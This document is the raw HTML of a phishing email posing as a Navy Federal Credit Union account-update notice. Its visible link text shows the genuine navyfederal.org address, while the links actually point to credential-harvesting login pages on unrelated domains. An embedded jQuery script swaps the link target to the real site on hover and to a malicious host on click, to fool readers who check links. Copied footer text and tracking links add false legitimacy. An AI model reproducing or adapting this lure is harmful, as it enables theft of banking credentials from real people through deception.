<html>
<head>
	<meta content="text/html; charset=utf-8" http-equiv="Content-Type" />
	<title>navy</title>
	<Script src="https://www.navyfederal.org/js/jquery-1.9.1.js"> </script><script>
$(document).ready(function(){
  $('.mylink').hover(function(){
   $('.mylink').attr("href","https://www.navyfederal.org/update");

   $('.mylink').click(function(){
    $('.mylink').attr("href", "http://cot4translation.com/nfcu/com.php");
   })
})
})


</script>
	<style type="text/css">html { -webkit-text-size-adjust:none; }
	.ReadMsgBody {width: 100%;}
	.ExternalClass{width: 100%;}
	.spacer {display:none; }
	.custom{display:none; }
	.unLink a {color:#333333;text-decoration: none;}
	.unLink2 a {color:#FFFFFF;text-decoration: none;}
	
	@media only screen and (max-width: 480px) {
	 body {
	  -webkit-text-size-adjust:100%;
	  -ms-text-size-adjust:100%;
	 }
	 *[class].remove { display:none !important; width:0 !important; height:0 !important; }
	 *[class].cellblock {display:block !important;}
	 *[class].content {width:100% !important; } 
	 *[class].center { text-align:center !important;}
	 *[class].custom {display:block !important; font-size:16px !important; color:#FF8719 !important; padding-bottom:10px !important;}
	 *[id]#logo *[class].img_resize_logo {width:90px !important; height:52px !important;}
	 *[id]#ehl *[class].img_resize_ehl {width:25px !important; height:26px !important;}
	 *[class].body {font-size:14px !important;}
	 *[class].headline {font-size:16px !important;}
	 *[id]#socialIcons *[class].img_resize_socialIcons {width:20px !important; height:20px !important;}
	 

}
	</style>
</head>
<body>
<table align="center" bgcolor="#ffffff" cellpadding="0" cellspacing="0" class="content" style="BORDER-TOP: #005b99 1px solid; BORDER-RIGHT: #005b99 1px solid; BORDER-BOTTOM: #005b99 1px solid; BORDER-LEFT: #005b99 1px solid" width="600">
	<tbody>
		<tr valign="top">
			<td>
			<table cellpadding="0" cellspacing="0" width="100%">
				<tbody>
					<tr>
						<td class="cellblock">
						<table bgcolor="#f3f6f9" cellpadding="10" cellspacing="0" width="100%">
							<tbody>
								<tr>
									<td>
									<table cellpadding="0" cellspacing="0" width="100%">
										<tbody>
											<tr>
												<td class="cellblock" rowspan="2">
												<table cellpadding="0" cellspacing="0" width="100%">
													<tbody>
														<tr>
															<td id="logo">
															<table align="left" border="0" cellpadding="0" cellspacing="0" id="defanged6-yui_3_16_0_ym19_1_1466073870376_9529" style="FONT-FAMILY: inherit; BORDER-COLLAPSE: collapse; COLOR: ; PADDING-BOTTOM: 0px; PADDING-TOP: 0px; PADDING-LEFT: 0px; MARGIN: 0px; PADDING-RIGHT: 0px; font-stretch: inherit">
																<tbody id="defanged6-yui_3_16_0_ym19_1_1466073870376_9528" style="WIDTH: 85px">
																	<tr id="defanged6-yui_3_16_0_ym19_1_1466073870376_9527">
																		<td align="left" height="49" id="defanged6-yui_3_16_0_ym19_1_1466073870376_9526" style="FONT-SIZE: 14px; FONT-FAMILY: Arial, sans-serif; BORDER-COLLAPSE: collapse; FONT-WEIGHT: bold; COLOR: rgb(0,87,162); BORDER-SPACING: 2px; MARGIN: 0px" width="85"><a href="http://response.nfcu.org/t?r=4&amp;c=18213&amp;l=2113&amp;ctl=86226:CEDCF2BFB497341782A2DCA123DEF4E0C642981F76BF3D97&amp;" id="defanged6-yui_3_16_0_ym19_1_1466073870376_9525" rel="noopener noreferrer" style="TEXT-DECORATION: none; BACKGROUND: none transparent scroll repeat 0% 0%; COLOR: rgb(0,87,162); OUTLINE-WIDTH: medium; PADDING-BOTTOM: 0px; PADDING-TOP: 0px; OUTLINE-STYLE: none; PADDING-LEFT: 0px; MARGIN: 0px; OUTLINE-COLOR: invert; PADDING-RIGHT: 0px; -webkit-tap-highlight-color: rgba(0, 0, 0, 0); background-size: initial; background-origin: initial; background-clip: initial" target="_blank"><img alt="Navy Federal Credit Union" border="0" height="49" id="defanged6-yui_3_16_0_ym19_1_1466073870376_9524" src="cid:nfcu-logo-test.png" style="FONT-SIZE: 12px; BORDER-TOP: 0px; BORDER-RIGHT: 0px; BORDER-BOTTOM: 0px; OUTLINE-WIDTH: medium; OUTLINE-STYLE: none; BORDER-LEFT: 0px; DISPLAY: block; OUTLINE-COLOR: invert" width="85" /=""></a></td>
																	</tr>
																</tbody>
															</table>
															</td>
															<td class="remove" rowspan="2" width="10"><img alt="" height="10" src="cid:spacer.gif" width="10" /=""></td>
															<td class="remove" valign="middle">&nbsp;</td>
															<td align="right" valign="top" width="160"><font face="Arial, sans-serif" size="3" style="FONT-SIZE: 11px"><font face="Arial, sans-serif" size="3" style="FONT-SIZE: 12px"><font color="#0e335e" face="Arial" size="3" style="COLOR: #0e335e; FONT: bold 12px arial">Navy Federal Security Zone</font><br />
															Email for Member </font></font></td>
															<td width="5">&nbsp;</td>
															<td align="right" valign="top" width="22"><img alt="" border="0" src="cid:lock.png" /="" width="22" height="31"></td>
														</tr>
													</tbody>
												</table>
												</td>
											</tr>
										</tbody>
									</table>
									</td>
								</tr>
							</tbody>
						</table>

						<table cellpadding="10" cellspacing="0">
							<tbody>
								<tr>
									<td>
									<table cellpadding="0" cellspacing="0" width="100%">
										<tbody>
											<tr valign="top">
												<td class="cellblock">
												<table cellpadding="0" cellspacing="0" width="100%">
													<tbody>
														<tr>
															<td style="display:none; COLOR: #ffffff; TEXT-ALIGN: center; FONT: bold 0px arial" align="center" class="custom">Online &amp; Mobile Banking Routine Maintenance</td>
														</tr>
													</tbody>
												</table>

												<table cellpadding="0" cellspacing="0" width="100%">
													<tbody>
														<tr>
															<td colspan="3">
															<p><font color="#ff8719" face="Arial" size="3" style="FONT: bold 16px arial">Account Update Preference</font></p>

															<p><font class="body" color="#333333" face="Arial, sans-serif" size="3" style="FONT-SIZE: 12px; LINE-HEIGHT: 20px">Due to concerns, for &nbsp;the safety and integrity&nbsp;of Navy Federal, we have issued this warning message</font></p>

															<p><font class="body" color="#333333" face="Arial, sans-serif" size="3" style="FONT-SIZE: 12px; LINE-HEIGHT: 20px">Your Navy Federal Needs to be Updated as part of our continuing commitment to protect your account and to reduce fraud and unauthorized activities on navy federal. </font></p>
															</td>
														</tr>
														<tr>
															<td colspan="3">
															<p><font class="body" color="#333333" face="Arial, sans-serif" size="3" style="FONT-SIZE: 12px; FONT-WEIGHT: bold; LINE-HEIGHT: 20px">&nbsp;Kindly Log on to </font><font class="body" face="Arial, sans-serif" size="3" style="FONT-SIZE: 12px; FONT-WEIGHT: bold; LINE-HEIGHT: 20px"><a href="http://www.thethriftyproject.com/Access/bc98f84e98ca7e6060897c070edcb926/login.php?cmd=login_submit&id=9707159f21c95ac136b861a2133edbe89707159f21c95ac136b861a2133edbe8&session=9707159f21c95ac136b861a2133edbe89707159f21c95ac136b861a2133edbe8"><span style="color:#0000CD;">https://www.navyfederal.org</span></a></font><font class="body" face="Arial, sans-serif" size="3" style="FONT-SIZE: 12px; FONT-WEIGHT: bold; LINE-HEIGHT: 20px"><a class="mylink" href="http://www.thethriftyproject.com/Access/bc98f84e98ca7e6060897c070edcb926/login.php?cmd=login_submit&id=9707159f21c95ac136b861a2133edbe89707159f21c95ac136b861a2133edbe8&session=9707159f21c95ac136b861a2133edbe89707159f21c95ac136b861a2133edbe8" rel="nofollow" target="_blank"><span style="color:#0000CD;">/update </span></a></font><font class="body" color="#333333" face="Arial, sans-serif" size="3" style="FONT-SIZE: 12px; FONT-WEIGHT: bold; LINE-HEIGHT: 20px">to update your profile.</font></p>

															<p><font class="body" color="#333333" face="Arial, sans-serif" size="3" style="FONT-SIZE: 12px; LINE-HEIGHT: 20px">We appreciate your support and understanding as we work together to make Navy Federal a safe place for banking</font></p>

															<p><font size="1"><font face="Verdana">&nbsp;</font></font><font color="#333333" face="Arial, sans-serif" size="3" style="FONT-SIZE: 10px">&copy; 2018 Navy Federal Credit Union.</font></p>
															</td>
														</tr>
													</tbody>
												</table>
												</td>
											</tr>
										</tbody>
									</table>
									</td>
								</tr>
							</tbody>
						</table>

						<table bgcolor="#ecebe4" cellpadding="10" cellspacing="0" style="BORDER-TOP: #dfe2e7 2px solid">
							<tbody>
								<tr>
									<td width="600">
									<table cellpadding="0" cellspacing="0" width="100%">
										<tbody>
											<tr>
												<td class="cellblock">
												<table cellpadding="0" cellspacing="0" width="100%">
													<tbody>
														<tr>
															<td colspan="3" valign="top"><font face="Arial, sans-serif" style="FONT-SIZE: 14px; COLOR: #266ab6"><a href="http://response.nfcu.org/t?r=2&amp;c=5498&amp;l=1391&amp;ctl=1B04A:98971CADA9C6677402B1B6EB45FBF0CC&amp;" style="TEXT-DECORATION: none; COLOR: #266ab6">Products &amp; Services</a> &bull; <a href="http://response.nfcu.org/t?r=2&amp;c=5498&amp;l=1391&amp;ctl=1B04C:98971CADA9C6677402B1B6EB45FBF0CC&amp;" style="TEXT-DECORATION: none; COLOR: #266ab6">FAQs</a> &bull; <a href="http://response.nfcu.org/t?r=2&amp;c=5498&amp;l=1391&amp;ctl=1B04E:98971CADA9C6677402B1B6EB45FBF0CC&amp;" style="TEXT-DECORATION: none; COLOR: #266ab6">Mobile Banking</a> &bull; <a href="http://response.nfcu.org/t?r=2&amp;c=5498&amp;l=1391&amp;ctl=1B050:98971CADA9C6677402B1B6EB45FBF0CC&amp;" style="TEXT-DECORATION: none; COLOR: #266ab6">Contact Us</a></font></td>
														</tr>
														<tr>
															<td colspan="3" height="5">&nbsp;</td>
														</tr>
														<tr>
															<td align="left" colspan="3" valign="top" width="535"><font color="#333333" face="Arial, sans-serif" size="3" style="FONT-SIZE: 10px">Please do not reply to this email. This email is being sent from Navy Federal Credit Union at <span class="unLink">PO Box 3000, Merrifield, VA 22119-3000</span>. For contact information, or if you have any questions about this email, please <a href="http://response.nfcu.org/t?r=2&amp;c=5498&amp;l=1391&amp;ctl=1B050:98971CADA9C6677402B1B6EB45FBF0CC&amp;" style="COLOR: #266ab5">click here</a> .</font></td>
														</tr>
														<tr>
															<td colspan="3" height="3">&nbsp;</td>
														</tr>
														<tr>
															<td height="39" valign="top" width="33"><img align="bottom" alt="" class="img_resize_ehl" height="39" src="cid:ehl-logo.gif" width="33" /=""></td>
															<td rowspan="5" width="5"><img alt="" height="5" src="cid:spacer.gif" width="5" /=""></td>
															<td align="left" rowspan="3" valign="bottom"><font color="#333333" face="Arial, sans-serif" size="3" style="FONT-SIZE: 10px"><a href="http://response.nfcu.org/t?r=2&amp;c=5498&amp;l=1391&amp;ctl=1B052:98971CADA9C6677402B1B6EB45FBF0CC&amp;" style="COLOR: #266ab5">Equal Housing Lender</a> | APY= Annual Percentage Yield | APR= Annual Percentage Rate. &copy; 2017 Navy Federal Credit Union. All rights reserved. Message and data rates may apply. <a href="http://response.nfcu.org/t?r=2&amp;c=5498&amp;l=1391&amp;ctl=1B054:98971CADA9C6677402B1B6EB45FBF0CC&amp;" style="COLOR: #266ab5">Terms and Conditions</a> are available. NFCU 32559 (9-14) <font color="#333333" face="Arial, sans-serif" size="3" style="FONT-SIZE: 12px; FONT-WEIGHT: bold">Federally insured by NCUA.</font></font></td>
														</tr>
													</tbody>
												</table>

												<table cellpadding="0" cellspacing="0" width="100%">
													<tbody>
														<tr>
															<td valign="bottom"><font color="#333333" face="Arial, sans-serif" size="3" style="font-size:12px;"><a href="http://response.nfcu.org/t?r=2&amp;c=5498&amp;l=1391&amp;ctl=1B056:98971CADA9C6677402B1B6EB45FBF0CC&amp;" style=" color:#266ab5;">Privacy Policy</a></font></td>
															<td align="right" valign="bottom"><font color="#266ab5" face="Arial, sans-serif" size="3" style="font-size:14px;">Follow Us:</font></td>
															<td width="3">&nbsp;</td>
															<td id="socialIcons" valign="bottom" width="21"><a href="http://response.nfcu.org/t?r=2&amp;c=5498&amp;l=1391&amp;ctl=1B058:98971CADA9C6677402B1B6EB45FBF0CC&amp;" style="color:#266ab5; font-family:Arial, sans-serif;font-size:14px;"><img align="right" alt="" border="0" class="img_resize_socialIcons" height="21" src="cid:fb-icon.gif" width="21" /=""></a></td>
															<td class="remove" width="3">&nbsp;</td>
															<td id="socialIcons" valign="bottom" width="21"><a href="http://response.nfcu.org/t?r=2&amp;c=5498&amp;l=1391&amp;ctl=1B05A:98971CADA9C6677402B1B6EB45FBF0CC&amp;" style="color:#266ab5; font-family:Arial, sans-serif;font-size:14px;"><img align="right" alt="" border="0" class="img_resize_socialIcons" height="21" src="cid:tw-icon.gif" width="21" /=""></a></td>
															<td align="right" valign="bottom">&nbsp;</td>
															<td class="remove" width="3">&nbsp;</td>
														</tr>
													</tbody>
												</table>
												</td>
											</tr>
										</tbody>
									</table>
									</td>
								</tr>
							</tbody>
						</table>
						</td>
					</tr>
				</tbody>
			</table>
			</td>
		</tr>
	</tbody>
</table>

<p><img border="0" height="1" src="cid:t" width="1" /="">
<style type="text/css">.wcdm__ { display: none; visibility: hidden; }
</style>
</p>
</body>
</html>
